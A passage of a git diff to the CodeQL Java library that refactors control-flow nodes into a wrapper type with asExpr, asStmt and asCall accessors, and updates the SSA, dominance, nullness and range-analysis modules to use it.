first(n.(ExprStmt).getExpr()) and completion = NormalCompletion() + result = first(n.asStmt().(ExprStmt).getExpr()) and completion = NormalCompletion() or - result = first(n.(StmtExpr).getStmt()) and completion = NormalCompletion() + result = first(n.asExpr().(StmtExpr).getStmt()) and completion = NormalCompletion() or - result = first(n.(LabeledStmt).getStmt()) and completion = NormalCompletion() + result = first(n.asStmt().(LabeledStmt).getStmt()) and completion = NormalCompletion() or // Variable declarations in a variable declaration statement are executed sequentially. exists(LocalVariableDeclStmt s | completion = NormalCompletion() | - n = s and result = first(s.getVariable(1)) + n.asStmt() = s and result = first(s.getVariable(1)) or exists(int i | last(s.getVariable(i), n, completion) and result = first(s.getVariable(i + 1))) ) or // When expressions: exists(WhenExpr whenexpr | - n = whenexpr and + n.asExpr() = whenexpr and result = first(whenexpr.getBranch(0)) and completion = NormalCompletion() or @@ -1425,7 +1510,7 @@ private module ControlFlowGraphImpl { or // When branches: exists(WhenBranch whenbranch | - n = whenbranch and + n.asStmt() = whenbranch and completion = NormalCompletion() and result = first(whenbranch.getCondition()) or @@ -1463,7 +1548,7 @@ private module ControlFlowGraphImpl { * predicate `finallyPred`, since their completion is resumed after normal * completion of the `finally`. */ - private Completion resumption(ControlFlowNode n) { + private Completion resumption(Node n) { exists(TryStmt try | lastInFinally(try, n) and finallyPred(try, _, result)) or not lastInFinally(_, n) and result = NormalCompletion() @@ -1474,9 +1559,7 @@ private module ControlFlowGraphImpl { * * That is, the `booleanCompletion` is the label of the edge in the CFG. */ - private ControlFlowNode mainBranchSucc(ControlFlowNode n, boolean b) { - result = succ(n, BooleanCompletion(_, b)) - } + private Node mainBranchSucc(Node n, boolean b) { result = succ(n, BooleanCompletion(_, b)) } /** * A true- or false-successor that is not tagged with a `booleanCompletion`. @@ -1487,8 +1570,8 @@ private module ControlFlowGraphImpl { * In the latter case, when `n` occurs as the last node in a finally block, there might be * multiple different such successors. */ - private ControlFlowNode otherBranchSucc(ControlFlowNode n, boolean b) { - exists(ControlFlowNode main | main = mainBranchSucc(n, b.booleanNot()) | + private Node otherBranchSucc(Node n, boolean b) { + exists(Node main | main = mainBranchSucc(n, b.booleanNot()) | result = succ(n, resumption(n)) and not result = main and (b = true or b = false) @@ -1497,7 +1580,7 @@ private module ControlFlowGraphImpl { /** Gets a true- or false-successor of `n`. */ cached - ControlFlowNode branchSuccessor(ControlFlowNode n, boolean branch) { + Node branchSuccessor(Node n, boolean branch) { result = mainBranchSucc(n, branch) or result = otherBranchSucc(n, branch) } @@ -1506,18 +1589,18 @@ private module ControlFlowGraphImpl { private import ControlFlowGraphImpl /** A control-flow node that branches based on a condition. */ -class ConditionNode extends ControlFlowNode { +class ConditionNode extends ControlFlow::Node { ConditionNode() { exists(branchSuccessor(this, _)) } /** Gets a true- or false-successor of the `ConditionNode`. */ - ControlFlowNode getABranchSuccessor(boolean branch) { result = branchSuccessor(this, branch) } + ControlFlow::Node getABranchSuccessor(boolean branch) { result = branchSuccessor(this, branch) } /** Gets a true-successor of the `ConditionNode`. */ - ControlFlowNode getATrueSuccessor() { result = this.getABranchSuccessor(true) } + ControlFlow::Node getATrueSuccessor() { result = this.getABranchSuccessor(true) } /** Gets a false-successor of the `ConditionNode`. */ - ControlFlowNode getAFalseSuccessor() { result = this.getABranchSuccessor(false) } + ControlFlow::Node getAFalseSuccessor() { result = this.getABranchSuccessor(false) } /** Gets the condition of this `ConditionNode`. This is equal to the node itself. */ - ExprParent getCondition() { result = this } + ExprParent getCondition() { result = this.asExpr() or result = this.asStmt() } } diff --git a/java/ql/lib/semmle/code/java/Expr.qll b/java/ql/lib/semmle/code/java/Expr.qll index 1862319e30b..24e5a6e24d8 100644 --- a/java/ql/lib/semmle/code/java/Expr.qll +++ b/java/ql/lib/semmle/code/java/Expr.qll @@ -61,10 +61,10 @@ class Expr extends ExprParent, @expr { Expr getAChildExpr() { exprs(result, _, _, this, _) } /** Gets the basic block in which this expression occurs, if any. */ - BasicBlock getBasicBlock() { result.getANode() = this } + BasicBlock getBasicBlock() { result.getANode().asExpr() = this } /** Gets the `ControlFlowNode` corresponding to this expression. */ - ControlFlowNode getControlFlowNode() { result = this } + ControlFlowNode getControlFlowNode() { result.asExpr() = this } /** This statement's Halstead ID (used to compute Halstead metrics). */ string getHalsteadID() { result = this.toString() } diff --git a/java/ql/lib/semmle/code/java/Statement.qll b/java/ql/lib/semmle/code/java/Statement.qll index f4eafd39e9f..da9621f9ce3 100644 --- a/java/ql/lib/semmle/code/java/Statement.qll +++ b/java/ql/lib/semmle/code/java/Statement.qll @@ -45,10 +45,10 @@ class Stmt extends StmtParent, ExprParent, @stmt { Stmt getAChild() { result.getParent() = this } /** Gets the basic block in which this statement occurs. */ - BasicBlock getBasicBlock() { result.getANode() = this } + BasicBlock getBasicBlock() { result.getANode().asStmt() = this } /** Gets the `ControlFlowNode` corresponding to this statement. */ - ControlFlowNode getControlFlowNode() { result = this } + ControlFlowNode getControlFlowNode() { result.asStmt() = this } /** Cast this statement to a class that provides access to metrics information. */ MetricStmt getMetrics() { result = this } diff --git a/java/ql/lib/semmle/code/java/controlflow/BasicBlocks.qll b/java/ql/lib/semmle/code/java/controlflow/BasicBlocks.qll index 3fae0f0b4d2..972f97ba367 100644 --- a/java/ql/lib/semmle/code/java/controlflow/BasicBlocks.qll +++ b/java/ql/lib/semmle/code/java/controlflow/BasicBlocks.qll @@ -66,3 +66,8 @@ class BasicBlock extends ControlFlowNode { /** Holds if this basic block post-dominates `node`. (This is reflexive.) */ predicate bbPostDominates(BasicBlock node) { bbPostDominates(this, node) } } + +/** A basic block that ends in an exit node. */ +class ExitBlock extends BasicBlock { + ExitBlock() { this.getLastNode() instanceof ControlFlow::ExitNode } +} diff --git a/java/ql/lib/semmle/code/java/controlflow/Dominance.qll b/java/ql/lib/semmle/code/java/controlflow/Dominance.qll index a1263ce3f0e..953bfa12e64 100644 --- a/java/ql/lib/semmle/code/java/controlflow/Dominance.qll +++ b/java/ql/lib/semmle/code/java/controlflow/Dominance.qll @@ -9,13 +9,15 @@ import java */ /** Entry points for control-flow. */ -private predicate flowEntry(Stmt entry) { - exists(Callable c | entry = c.getBody()) - or - // This disjunct is technically superfluous, but safeguards against extractor problems. - entry instanceof BlockStmt and - not exists(entry.getEnclosingCallable()) and - not entry.getParent() instanceof Stmt +private predicate flowEntry(BasicBlock entry) { + exists(Stmt entrystmt | entrystmt = entry.getFirstNode().asStmt() | + exists(Callable c | entrystmt = c.getBody()) + or + // This disjunct is technically superfluous, but safeguards against extractor problems. + entrystmt instanceof BlockStmt and + not exists(entry.getEnclosingCallable()) and + not entrystmt.getParent() instanceof Stmt + ) } /** The successor relation for basic blocks. */ @@ -31,11 +33,8 @@ predicate hasDominanceInformation(BasicBlock bb) { exists(BasicBlock entry | flowEntry(entry) and bbSucc*(entry, bb)) } -/** Exit points for control-flow. */ -private predicate flowExit(Callable exit) { exists(ControlFlowNode s | s.getASuccessor() = exit) } - /** Exit points for basic-block control-flow. */ -private predicate bbSink(BasicBlock exit) { flowExit(exit.getLastNode()) } +private predicate bbSink(BasicBlock exit) { exit.getLastNode() instanceof ControlFlow::ExitNode } /** Reversed `bbSucc`. */ private predicate bbPred(BasicBlock post, BasicBlock pre) { post = pre.getABBSuccessor() } diff --git a/java/ql/lib/semmle/code/java/controlflow/Guards.qll b/java/ql/lib/semmle/code/java/controlflow/Guards.qll index 0d0ecd5b2ea..ff564b3a446 100644 --- a/java/ql/lib/semmle/code/java/controlflow/Guards.qll +++ b/java/ql/lib/semmle/code/java/controlflow/Guards.qll @@ -113,7 +113,7 @@ private PatternCase getClosestPrecedingPatternCase(SwitchCase case) { private predicate isNonFallThroughPredecessor(SwitchCase sc, ControlFlowNode pred) { pred = sc.getControlFlowNode().getAPredecessor() and ( - pred.(Expr).getParent*() = sc.getSelectorExpr() + pred.asExpr().getParent*() = sc.getSelectorExpr() or // Ambiguous: in the case of `case String _ when x: case "SomeConstant":`, the guard `x` // passing edge will fall through into the constant case, and the guard failing edge @@ -122,7 +122,7 @@ private predicate isNonFallThroughPredecessor(SwitchCase sc, ControlFlowNode pre exists(PatternCase previousPatternCase | previousPatternCase = getClosestPrecedingPatternCase(sc) | - pred.(Expr).getParent*() = previousPatternCase.getGuard() and + pred.asExpr().getParent*() = previousPatternCase.getGuard() and // Check there is any statement in between the previous pattern case and this one, // or the case is a rule, so there is no chance of a fall-through. ( @@ -133,7 +133,7 @@ private predicate isNonFallThroughPredecessor(SwitchCase sc, ControlFlowNode pre or // Unambigious: on the test-passing edge there must be at least one intervening // declaration node, including anonymous `_` declarations. - pred = getClosestPrecedingPatternCase(sc) + pred.asStmt() = getClosestPrecedingPatternCase(sc) ) } diff --git a/java/ql/lib/semmle/code/java/controlflow/Paths.qll b/java/ql/lib/semmle/code/java/controlflow/Paths.qll index b4e9a68b280..5a06a3a1ee5 100644 --- a/java/ql/lib/semmle/code/java/controlflow/Paths.qll +++ b/java/ql/lib/semmle/code/java/controlflow/Paths.qll @@ -32,7 +32,7 @@ abstract class ActionConfiguration extends string { private BasicBlock actionBlock(ActionConfiguration conf) { exists(ControlFlowNode node | result = node.getBasicBlock() | conf.isAction(node) or - callAlwaysPerformsAction(node, conf) + callAlwaysPerformsAction(node.asCall(), conf) ) } @@ -45,17 +45,17 @@ private predicate callAlwaysPerformsAction(Call call, ActionConfiguration conf) /** Holds if an action dominates the exit of the callable. */ private predicate actionDominatesExit(Callable callable, ActionConfiguration conf) { - exists(BasicBlock exit | - exit.getLastNode() = callable and + exists(ExitBlock exit | + exit.getEnclosingCallable() = callable and actionBlock(conf).bbDominates(exit) ) } /** Gets a `BasicBlock` that contains an action that does not dominate the exit. */ private BasicBlock nonDominatingActionBlock(ActionConfiguration conf) { - exists(BasicBlock exit | + exists(ExitBlock exit | result = actionBlock(conf) and - exit.getLastNode() = result.getEnclosingCallable() and + exit.getEnclosingCallable() = result.getEnclosingCallable() and not result.bbDominates(exit) ) } @@ -80,8 +80,8 @@ private predicate postActionBlock(BasicBlock bb, ActionConfiguration conf) { private predicate callableAlwaysPerformsAction(Callable callable, ActionConfiguration conf) { actionDominatesExit(callable, conf) or - exists(BasicBlock exit | - exit.getLastNode() = callable and + exists(ExitBlock exit | + exit.getEnclosingCallable() = callable and postActionBlock(exit, conf) ) } diff --git a/java/ql/lib/semmle/code/java/controlflow/UnreachableBlocks.qll b/java/ql/lib/semmle/code/java/controlflow/UnreachableBlocks.qll index f34ace10d31..7bcc732de6a 100644 --- a/java/ql/lib/semmle/code/java/controlflow/UnreachableBlocks.qll +++ b/java/ql/lib/semmle/code/java/controlflow/UnreachableBlocks.qll @@ -207,14 +207,12 @@ class UnreachableBasicBlock extends BasicBlock { conditionBlock.controls(this, constant.booleanNot()) ) or - // This block is not reachable in the CFG, and is not a callable, a body of a callable, an - // expression in an annotation, an expression in an assert statement, or a catch clause. + // This block is not reachable in the CFG, and is not the entrypoint in a callable, an + // expression in an assert statement, or a catch clause. forall(BasicBlock bb | bb = this.getABBPredecessor() | bb instanceof UnreachableBasicBlock) and - not exists(Callable c | c.getBody() = this) and - not this instanceof Callable and - not exists(Annotation a | a.getAChildExpr*() = this) and - not this.(Expr).getEnclosingStmt() instanceof AssertStmt and - not this instanceof CatchClause + not exists(Callable c | c.getBody().getControlFlowNode() = this.getFirstNode()) and + not this.getFirstNode().asExpr().getEnclosingStmt() instanceof AssertStmt and + not this.getFirstNode().asStmt() instanceof CatchClause or // Switch statements with a constant comparison expression may have unreachable cases. exists(ConstSwitchStmt constSwitchStmt, BasicBlock unreachableCaseBlock | diff --git a/java/ql/lib/semmle/code/java/dataflow/InstanceAccess.qll b/java/ql/lib/semmle/code/java/dataflow/InstanceAccess.qll index 18bdb879c3c..0bae1b5e9c1 100644 --- a/java/ql/lib/semmle/code/java/dataflow/InstanceAccess.qll +++ b/java/ql/lib/semmle/code/java/dataflow/InstanceAccess.qll @@ -227,12 +227,14 @@ class InstanceAccessExt extends TInstanceAccessExt { /** Gets the control flow node associated with this instance access. */ ControlFlowNode getCfgNode() { exists(ExprParent e | e = this.getAssociatedExprOrStmt() | - e instanceof Call and result = e + result.asCall() = e or - e instanceof InstanceAccess and result = e + e.(InstanceAccess).getControlFlowNode() = result or exists(FieldAccess fa | fa = e | - if fa instanceof VarRead then fa = result else result.(AssignExpr).getDest() = fa + if fa instanceof VarRead + then fa.getControlFlowNode() = result + else result.asExpr().(AssignExpr).getDest() = fa ) ) } diff --git a/java/ql/lib/semmle/code/java/dataflow/Nullness.qll b/java/ql/lib/semmle/code/java/dataflow/Nullness.qll index fb2fc668cf3..618716629b1 100644 --- a/java/ql/lib/semmle/code/java/dataflow/Nullness.qll +++ b/java/ql/lib/semmle/code/java/dataflow/Nullness.qll @@ -130,8 +130,8 @@ predicate dereference(Expr e) { * The `VarAccess` is included for nicer error reporting. */ private ControlFlowNode varDereference(SsaVariable v, VarAccess va) { - dereference(result) and - result = sameValue(v, va) + dereference(result.asExpr()) and + result.asExpr() = sameValue(v, va) } /** @@ -141,16 +141,16 @@ private ControlFlowNode varDereference(SsaVariable v, VarAccess va) { private ControlFlowNode ensureNotNull(SsaVariable v) { result = varDereference(v, _) or - result.(AssertStmt).getExpr() = nullGuard(v, true, false) + result.asStmt().(AssertStmt).getExpr() = nullGuard(v, true, false) or - exists(AssertTrueMethod m | result = m.getACheck(nullGuard(v, true, false))) + exists(AssertTrueMethod m | result.asCall() = m.getACheck(nullGuard(v, true, false))) or - exists(AssertFalseMethod m | result = m.getACheck(nullGuard(v, false, false))) + exists(AssertFalseMethod m | result.asCall() = m.getACheck(nullGuard(v, false, false))) or - exists(AssertNotNullMethod m | result = m.getACheck(v.getAUse())) + exists(AssertNotNullMethod m | result.asCall() = m.getACheck(v.getAUse())) or exists(AssertThatMethod m, MethodCall ma | - result = m.getACheck(v.getAUse()) and ma.getControlFlowNode() = result + result.asCall() = m.getACheck(v.getAUse()) and ma.getControlFlowNode() = result | ma.getAnArgument().(MethodCall).getMethod().getName() = "notNullValue" ) @@ -279,10 +279,10 @@ private predicate enhancedForEarlyExit(EnhancedForStmt for, ControlFlowNode n1, exists(Expr forExpr | n1.getANormalSuccessor() = n2 and for.getExpr() = forExpr and - forExpr.getAChildExpr*() = n1 and - not forExpr.getAChildExpr*() = n2 and - n1.getANormalSuccessor() = for.getVariable() and - not n2 = for.getVariable() + forExpr.getAChildExpr*() = n1.asExpr() and + not forExpr.getAChildExpr*() = n2.asExpr() and + n1.getANormalSuccessor().asExpr() = for.getVariable() and + not n2.asExpr() = for.getVariable() ) } @@ -343,7 +343,7 @@ private predicate nullVarStep( not impossibleEdge(mid, bb) and not exists(boolean branch | nullGuard(midssa, branch, false).hasBranchEdge(mid, bb, branch)) and not (leavingFinally(mid, bb, true) and midstoredcompletion = true) and - if bb.getFirstNode() = any(TryStmt try | | try.getFinally()) + if bb.getFirstNode().asStmt() = any(TryStmt try | | try.getFinally()) then if bb.getFirstNode() = mid.getLastNode().getANormalSuccessor() then storedcompletion = false diff --git a/java/ql/lib/semmle/code/java/dataflow/RangeAnalysis.qll b/java/ql/lib/semmle/code/java/dataflow/RangeAnalysis.qll index e0055d53f08..c950963b104 100644 --- a/java/ql/lib/semmle/code/java/dataflow/RangeAnalysis.qll +++ b/java/ql/lib/semmle/code/java/dataflow/RangeAnalysis.qll @@ -211,9 +211,11 @@ module Sem implements Semantic { BasicBlock getABasicBlockSuccessor(BasicBlock bb) { result = bb.getABBSuccessor() } - private predicate id(BasicBlock x, BasicBlock y) { x = y } + private predicate id(ExprParent x, ExprParent y) { x = y } - private predicate idOf(BasicBlock x, int y) = equivalenceRelation(id/2)(x, y) + private predicate idOfAst(ExprParent x, int y) = equivalenceRelation(id/2)(x, y) + + private predicate idOf(BasicBlock x, int y) { idOfAst(x.getAstNode(), y) } int getBlockId1(BasicBlock bb) { idOf(bb, result) } diff --git a/java/ql/lib/semmle/code/java/dataflow/SSA.qll b/java/ql/lib/semmle/code/java/dataflow/SSA.qll index 0fc0da8e871..ce58e7d58dc 100644 --- a/java/ql/lib/semmle/code/java/dataflow/SSA.qll +++ b/java/ql/lib/semmle/code/java/dataflow/SSA.qll @@ -228,7 +228,7 @@ private module SsaImpl { /** Holds if `n` must update the locally tracked variable `v`. */ cached predicate certainVariableUpdate(TrackedVar v, ControlFlowNode n, BasicBlock b, int i) { - exists(VariableUpdate a | a = n | getDestVar(a) = v) and + exists(VariableUpdate a | a.getControlFlowNode() = n | getDestVar(a) = v) and b.getNode(i) = n and hasDominanceInformation(b) or @@ -237,8 +237,8 @@ private module SsaImpl { /** Gets the definition point of a nested class in the parent scope. */ private ControlFlowNode parentDef(NestedClass nc) { - nc.(AnonymousClass).getClassInstanceExpr() = result or - nc.(LocalClass).getLocalTypeDeclStmt() = result + nc.(AnonymousClass).getClassInstanceExpr().getControlFlowNode() = result or + nc.(LocalClass).getLocalTypeDeclStmt().getControlFlowNode() = result } /** @@ -276,7 +276,7 @@ private module SsaImpl { /** Holds if `VarAccess` `use` of `v` occurs in `b` at index `i`. */ private predicate variableUse(TrackedVar v, VarRead use, BasicBlock b, int i) { - v.getAnAccess() = use and b.getNode(i) = use + v.getAnAccess() = use and b.getNode(i) = use.getControlFlowNode() } /** Holds if the value of `v` is captured in `b` at index `i`. */ @@ -423,7 +423,7 @@ private module SsaImpl { * `f` has an update somewhere. */ private predicate updateCandidate(TrackedField f, Call call, BasicBlock b, int i) { - b.getNode(i) = call and + b.getNode(i).asCall() = call and call.getEnclosingCallable() = f.getEnclosingCallable() and relevantFieldUpdate(_, f.getField(), _) } @@ -550,7 +550,7 @@ private module SsaImpl { /** Holds if `n` might update the locally tracked variable `v`. */ cached predicate uncertainVariableUpdate(TrackedVar v, ControlFlowNode n, BasicBlock b, int i) { - exists(Call c | c = n | updatesNamedField(c, v, _)) and + exists(Call c | c = n.asCall() | updatesNamedField(c, v, _)) and b.getNode(i) = n and hasDominanceInformation(b) or @@ -574,12 +574,16 @@ private module SsaImpl { /** Holds if `v` has an implicit definition at the entry, `b`, of the callable. */ cached predicate hasEntryDef(TrackedVar v, BasicBlock b) { - exists(LocalScopeVariable l, Callable c | v = TLocalVar(c, l) and c.getBody() = b | + exists(LocalScopeVariable l, Callable c | + v = TLocalVar(c, l) and c.getBody().getControlFlowNode() = b + | l instanceof Parameter or l.getCallable() != c ) or - v instanceof SsaSourceField and v.getEnclosingCallable().getBody() = b and liveAtEntry(v, b) + v instanceof SsaSourceField and + v.getEnclosingCallable().getBody().getControlFlowNode() = b and + liveAtEntry(v, b) } /** @@ -882,7 +886,7 @@ private newtype TSsaVariable = } or TSsaEntryDef(TrackedVar v, BasicBlock b) { hasEntryDef(v, b) } or TSsaUntracked(SsaSourceField nf, ControlFlowNode n) { - n = nf.getAnAccess().(FieldRead) and not trackField(nf) + n = nf.getAnAccess().(FieldRead).getControlFlowNode() and not trackField(nf) } /** @@ -940,7 +944,7 @@ class SsaVariable extends TSsaVariable { /** Gets an access of this SSA variable. */ VarRead getAUse() { ssaDefReachesUse(_, this, result) or - this = TSsaUntracked(_, result) + this = TSsaUntracked(_, result.getControlFlowNode()) } /** @@ -954,7 +958,7 @@ class SsaVariable extends TSsaVariable { */ VarRead getAFirstUse() { firstUse(this, result) or - this = TSsaUntracked(_, result) + this = TSsaUntracked(_, result.getControlFlowNode()) } /** Holds if this SSA variable is live at the end of `b`. */ @@ -990,7 +994,7 @@ class SsaUpdate extends SsaVariable { class SsaExplicitUpdate extends SsaUpdate, TSsaCertainUpdate { SsaExplicitUpdate() { exists(VariableUpdate upd | - upd = this.getCfgNode() and getDestVar(upd) = this.getSourceVariable() + upd.getControlFlowNode() = this.getCfgNode() and getDestVar(upd) = this.getSourceVariable() ) } @@ -998,7 +1002,8 @@ class SsaExplicitUpdate extends SsaUpdate, TSsaCertainUpdate { /** Gets the `VariableUpdate` defining the SSA variable. */ VariableUpdate getDefiningExpr() { - result = this.getCfgNode() and getDestVar(result) = this.getSourceVariable() + result.getControlFlowNode() = this.getCfgNode() and + getDestVar(result) = this.getSourceVariable() } } @@ -1038,7 +1043,7 @@ class SsaImplicitUpdate extends SsaUpdate { exists(SsaSourceField f, Callable setter | f = this.getSourceVariable() and relevantFieldUpdate(setter, f.getField(), result) and - updatesNamedField(this.getCfgNode(), f, setter) + updatesNamedField(this.getCfgNode().asCall(), f, setter) ) } @@ -1086,7 +1091,7 @@ class SsaImplicitInit extends SsaVariable, TSsaEntryDef { */ predicate isParameterDefinition(Parameter p) { this.getSourceVariable() = TLocalVar(p.getCallable(), p) and - p.getCallable().getBody() = this.getCfgNode() + p.getCallable().getBody().getControlFlowNode() = this.getCfgNode() } } diff --git a/java/ql/lib/semmle/code/java/dataflow/TypeFlow.qll b/java/ql/lib/semmle/code/java/dataflow/TypeFlow.qll index 9e05b69db4a..d29cc1ae542 100644 --- a/java/ql/lib/semmle/code/java/dataflow/TypeFlow.qll +++ b/java/ql/lib/semmle/code/java/dataflow/TypeFlow.qll @@ -252,8 +252,8 @@ private module Input implements TypeFlowInput { downcastSuccessorAux(pragma[only_bind_into](cast), v, t, t1, t2) and t1.getASourceSupertype+() = t2 and va = v.getAUse() and - dominates(cast, va) and - dominates(cast.(ControlFlowNode).getANormalSuccessor(), va) + dominates(cast.getControlFlowNode(), va.getControlFlowNode()) and + dominates(cast.getControlFlowNode().getANormalSuccessor(), va.getControlFlowNode()) ) } diff --git a/java/ql/lib/semmle/code/java/dataflow/internal/BaseSSA.qll b/java/ql/lib/semmle/code/java/dataflow/internal/BaseSSA.qll index 79f12e57f6a..073d87d9744 100644 --- a/java/ql/lib/semmle/code/java/dataflow/internal/BaseSSA.qll +++ b/java/ql/lib/semmle/code/java/dataflow/internal/BaseSSA.qll @@ -73,15 +73,15 @@ private module SsaImpl { /** Holds if `n` updates the local variable `v`. */ cached predicate variableUpdate(BaseSsaSourceVariable v, ControlFlowNode n, BasicBlock b, int i) { - exists(VariableUpdate a | a = n | getDestVar(a) = v) and + exists(VariableUpdate a | a.getControlFlowNode() = n | getDestVar(a) = v) and b.getNode(i) = n and hasDominanceInformation(b) } /** Gets the definition point of a nested class in the parent scope. */ private ControlFlowNode parentDef(NestedClass nc) { - nc.(AnonymousClass).getClassInstanceExpr() = result or - nc.(LocalClass).getLocalTypeDeclStmt() = result + nc.(AnonymousClass).getClassInstanceExpr().getControlFlowNode() = result or + nc.(LocalClass).getLocalTypeDeclStmt().getControlFlowNode() = result } /** @@ -121,7 +121,7 @@ private module SsaImpl { /** Holds if `VarAccess` `use` of `v` occurs in `b` at index `i`. */ private predicate variableUse(BaseSsaSourceVariable v, VarRead use, BasicBlock b, int i) { - v.getAnAccess() = use and b.getNode(i) = use + v.getAnAccess() = use and b.getNode(i) = use.getControlFlowNode() } /** Holds if the value of `v` is captured in `b` at index `i`. */ @@ -164,7 +164,9 @@ private module SsaImpl { /** Holds if `v` has an implicit definition at the entry, `b`, of the callable. */ cached predicate hasEntryDef(BaseSsaSourceVariable v, BasicBlock b) { - exists(LocalScopeVariable l, Callable c | v = TLocalVar(c, l) and c.getBody() = b | + exists(LocalScopeVariable l, Callable c | + v = TLocalVar(c, l) and c.getBody().getControlFlowNode() = b + | l instanceof Parameter or l.getCallable() != c ) @@ -537,7 +539,7 @@ class BaseSsaVariable extends TBaseSsaVariable { class BaseSsaUpdate extends BaseSsaVariable, TSsaUpdate { BaseSsaUpdate() { exists(VariableUpdate upd | - upd = this.getCfgNode() and getDestVar(upd) = this.getSourceVariable() + upd.getControlFlowNode() = this.getCfgNode() and getDestVar(upd) = this.getSourceVariable() ) } @@ -545,7 +547,8 @@ class BaseSsaUpdate extends BaseSsaVariable, TSsaUpdate { /** Gets the `VariableUpdate` defining the SSA variable. */ VariableUpdate getDefiningExpr() { - result = this.getCfgNode() and getDestVar(result) = this.getSourceVariable() + result.getControlFlowNode() = this.getCfgNode() and + getDestVar(result) = this.getSourceVariable() } } @@ -566,7 +569,7 @@ class BaseSsaImplicitInit extends BaseSsaVariable, TSsaEntryDef { */ predicate isParameterDefinition(Parameter p) { this.getSourceVariable() = TLocalVar(p.getCallable(), p) and - p.getCallable().getBody() = this.getCfgNode() + p.getCallable().getBody().getControlFlowNode() = this.getCfgNode() } } diff --git a/java/ql/lib/semmle/code/java/dataflow/internal/DataFlowPrivate.qll b/java/ql/lib/semmle/code/java/dataflow/internal/DataFlowPrivate.qll index 589d75c3635..704e5714784 100644 --- a/java/ql/lib/semmle/code/java/dataflow/internal/DataFlowPrivate.qll +++ b/java/ql/lib/semmle/code/java/dataflow/internal/DataFlowPrivate.qll @@ -112,7 +112,7 @@ private module CaptureInput implements VariableCapture::InputSig { Location getLocation() { result = super.getLocation() } - predicate hasCfgNode(BasicBlock bb, int i) { this = bb.(J::BasicBlock).getNode(i) } + predicate hasCfgNode(BasicBlock bb, int i) { this = bb.(J::BasicBlock).getNode(i).asExpr() } } class VariableWrite extends Expr instanceof VariableUpdate { diff --git a/java/ql/lib/semmle/code/java/dataflow/internal/DataFlowUtil.qll b/java/ql/lib/semmle/code/java/dataflow/internal/DataFlowUtil.qll index bb71ed25c73..c66af2c78c5 100644 --- a/java/ql/lib/semmle/code/java/dataflow/internal/DataFlowUtil.qll +++ b/java/ql/lib/semmle/code/java/dataflow/internal/DataFlowUtil.qll @@ -17,9 +17,11 @@ import DataFlowNodes::Public /** Holds if `n` is an access to an unqualified `this` at `cfgnode`. */ private predicate thisAccess(Node n, ControlFlowNode cfgnode) { - n.(InstanceParameterNode).getCallable().getBody() = cfgnode + n.(InstanceParameterNode).getCallable().getBody() = cfgnode.asStmt() or - exists(InstanceAccess ia | ia = n.asExpr() and ia = cfgnode and ia.isOwnInstanceAccess()) + exists(InstanceAccess ia | + ia = n.asExpr() and ia.getControlFlowNode() = cfgnode and ia.isOwnInstanceAccess() + ) or n.(ImplicitInstanceAccess).getInstanceAccess().(OwnInstanceAccess).getCfgNode() = cfgnode } diff --git a/java/ql/lib/semmle/code/java/dataflow/internal/rangeanalysis/ModulusAnalysisSpecific.qll b/java/ql/lib/semmle/code/java/dataflow/internal/rangeanalysis/ModulusAnalysisSpecific.qll index 35384874b0d..c88b9946faa 100644 --- a/java/ql/lib/semmle/code/java/dataflow/internal/rangeanalysis/ModulusAnalysisSpecific.qll +++ b/java/ql/lib/semmle/code/java/dataflow/internal/rangeanalysis/ModulusAnalysisSpecific.qll @@ -133,5 +133,5 @@ module Private { predicate ssaUpdateStep = RU::ssaUpdateStep/3; - Expr getABasicBlockExpr(BasicBlock bb) { result = bb.getANode() } + Expr getABasicBlockExpr(BasicBlock bb) { result = bb.getANode().asExpr() } } diff --git a/java/ql/lib/semmle/code/java/dataflow/internal/rangeanalysis/SignAnalysisSpecific.qll b/java/ql/lib/semmle/code/java/dataflow/internal/rangeanalysis/SignAnalysisSpecific.qll index bcc11e26518..ee2e3bb2412 100644 --- a/java/ql/lib/semmle/code/java/dataflow/internal/rangeanalysis/SignAnalysisSpecific.qll +++ b/java/ql/lib/semmle/code/java/dataflow/internal/rangeanalysis/SignAnalysisSpecific.qll @@ -340,7 +340,7 @@ private module Impl { Field getField(FieldAccess fa) { result = fa.getField() } - Expr getAnExpression(SsaReadPositionBlock bb) { result = bb.getBlock().getANode() } + Expr getAnExpression(SsaReadPositionBlock bb) { result = bb.getBlock().getANode().asExpr() } Guard getComparisonGuard(ComparisonExpr ce) { result = ce } } diff --git a/java/ql/lib/semmle/code/java/dataflow/internal/rangeanalysis/SsaReadPositionSpecific.qll b/java/ql/lib/semmle/code/java/dataflow/internal/rangeanalysis/SsaReadPositionSpecific.qll index 410dc6b5cfe..8712ad635f5 100644 --- a/java/ql/lib/semmle/code/java/dataflow/internal/rangeanalysis/SsaReadPositionSpecific.qll +++ b/java/ql/lib/semmle/code/java/dataflow/internal/rangeanalysis/SsaReadPositionSpecific.qll @@ -15,9 +15,11 @@ class BasicBlock = BB::BasicBlock; /** Gets a basic block in which SSA variable `v` is read. */ BasicBlock getAReadBasicBlock(SsaVariable v) { result = v.getAUse().getBasicBlock() } -private predicate id(BasicBlock x, BasicBlock y) { x = y } +private predicate id(BB::ExprParent x, BB::ExprParent y) { x = y } -private predicate idOf(BasicBlock x, int y) = equivalenceRelation(id/2)(x, y) +private predicate idOfAst(BB::ExprParent x, int y) = equivalenceRelation(id/2)(x, y) + +private predicate idOf(BasicBlock x, int y) { idOfAst(x.getAstNode(), y) } private int getId(BasicBlock bb) { idOf(bb, result) } diff --git a/java/ql/lib/semmle/code/java/frameworks/Assertions.qll b/java/ql/lib/semmle/code/java/frameworks/Assertions.qll index 287346b8536..e7f86b9bfd8 100644 --- a/java/ql/lib/semmle/code/java/frameworks/Assertions.qll +++ b/java/ql/lib/semmle/code/java/frameworks/Assertions.qll @@ -109,12 +109,12 @@ predicate assertFail(BasicBlock bb, ControlFlowNode n) { bb = n.getBasicBlock() and ( exists(AssertTrueMethod m | - n = m.getACheck(any(BooleanLiteral b | b.getBooleanValue() = false)) + n.asExpr() = m.getACheck(any(BooleanLiteral b | b.getBooleanValue() = false)) ) or exists(AssertFalseMethod m | - n = m.getACheck(any(BooleanLiteral b | b.getBooleanValue() = true)) + n.asExpr() = m.getACheck(any(BooleanLiteral b | b.getBooleanValue() = true)) ) or - exists(AssertFailMethod m | n = m.getACheck()) or - n.(AssertStmt).getExpr().(BooleanLiteral).getBooleanValue() = false + exists(AssertFailMethod m | n.asExpr() = m.getACheck()) or + n.asStmt().(AssertStmt).getExpr().(BooleanLiteral).getBooleanValue() = false ) } diff --git a/java/ql/lib/semmle/code/java/metrics/MetricCallable.qll b/java/ql/lib/semmle/code/java/metrics/MetricCallable.qll index a888050185e..d3dca781e54 100644 --- 